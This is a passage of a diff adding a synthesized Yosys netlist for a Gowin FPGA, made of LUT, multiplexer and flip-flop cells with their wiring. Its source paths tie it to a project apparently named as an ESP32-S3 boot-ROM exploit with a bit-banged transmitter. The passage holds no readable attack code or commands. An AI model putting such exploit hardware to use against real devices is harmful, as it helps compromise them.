"c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 271 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 272 ], + "I1": [ 273 ], + "O": [ 265 ], + "S0": [ 89 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 274 ], + "I1": [ 275 ], + "O": [ 272 ], + "S0": [ 86 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 274 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 275 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 276 ], + "I1": [ 277 ], + "O": [ 273 ], + "S0": [ 86 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 276 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 277 ], + "I0": [ 27 ] + } + }, + "running_DFFS_Q": { + "hide_name": 0, + "type": "DFFS", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:55.7-55.57" + }, + "port_directions": { + "CLK": "input", + "D": "input", + "Q": "output", + "SET": "input" + }, + "connections": { + "CLK": [ 13 ], + "D": [ 278 ], + "Q": [ 256 ], + "SET": [ 27 ] + } + }, + "running_DFFS_Q_D_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0100010101010101" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 278 ], + "I0": [ 279 ], + "I1": [ 280 ], + "I2": [ 236 ], + "I3": [ 235 ] + } + }, + "running_DFF_Q": { + "hide_name": 0, + "type": "DFF", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:13.6-13.47" + }, + "port_directions": { + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CLK": [ 13 ], + "D": [ 280 ], + "Q": [ 255 ] + } + }, + "running_LUT3_I1": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "10001100" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 280 ], + "I0": [ 241 ], + "I1": [ 255 ], + "I2": [ 242 ] + } + }, + "running_LUT3_I2": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "00001011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 279 ], + "I0": [ 241 ], + "I1": [ 242 ], + "I2": [ 256 ] + } + }, + "running_LUT4_I1": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0111001101010000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 42 ], + "I0": [ 241 ], + "I1": [ 255 ], + "I2": [ 242 ], + "I3": [ 256 ] + } + }, + "running_LUT4_I1_F_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "10000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 233 ], + "I0": [ 131 ], + "I1": [ 133 ], + "I2": [ 281 ] + } + }, + "running_LUT4_I1_F_LUT3_F_I2_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1000000000000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 281 ], + "I0": [ 118 ], + "I1": [ 121 ], + "I2": [ 125 ], + "I3": [ 128 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 282 ], + "I1": [ 283 ], + "O": [ 235 ], + "S0": [ 284 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 282 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0001000000000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 283 ], + "I0": [ 111 ], + "I1": [ 114 ], + "I2": [ 262 ], + "I3": [ 263 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0001" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:139.23-140.26" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input" + }, + "connections": { + "F": [ 262 ], + "I0": [ 48 ], + "I1": [ 52 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000000000001" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 263 ], + "I0": [ 55 ], + "I1": [ 58 ], + "I2": [ 61 ], + "I3": [ 64 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O": { + "hide_name": 0, + "type": "MUX2_LUT7", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:166.14-166.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 285 ], + "I1": [ 286 ], + "O": [ 284 ], + "S0": [ 91 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 287 ], + "I1": [ 288 ], + "O": [ 285 ], + "S0": [ 89 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 289 ], + "I1": [ 290 ], + "O": [ 287 ], + "S0": [ 86 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 289 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 290 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 291 ], + "I1": [ 292 ], + "O": [ 288 ], + "S0": [ 86 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 291 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 292 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 293 ], + "I1": [ 294 ], + "O": [ 286 ], + "S0": [ 89 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 295 ], + "I1": [ 296 ], + "O": [ 293 ], + "S0": [ 86 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 295 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 296 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 297 ], + "I1": [ 298 ], + "O": [ 294 ], + "S0": [ 86 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000000100000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 297 ], + "I0": [ 67 ], + "I1": [ 70 ], + "I2": [ 73 ], + "I3": [ 76 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 298 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 299 ], + "I1": [ 300 ], + "O": [ 236 ], + "S0": [ 301 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 302 ], + "I1": [ 303 ], + "O": [ 299 ], + "S0": [ 304 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 302 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 303 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 305 ], + "I1": [ 306 ], + "O": [ 300 ], + "S0": [ 304 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 305 ], + "I0": [ 27 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000000000001" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 306 ], + "I0": [ 96 ], + "I1": [ 99 ], + "I2": [ 102 ], + "I3": [ 105 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0001" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:139.23-140.26" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input" + }, + "connections": { + "F": [ 304 ], + "I0": [ 108 ], + "I1": [ 83 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "00000001" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 301 ], + "I0": [ 44 ], + "I1": [ 46 ], + "I2": [ 81 ] + } + } + }, + "netnames": { + "bang_tx": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:5.12-5.19" + } + }, + "bang_tx_reg": { + "hide_name": 0, + "bits": [ 11, 27 ], + "attributes": { + "src": 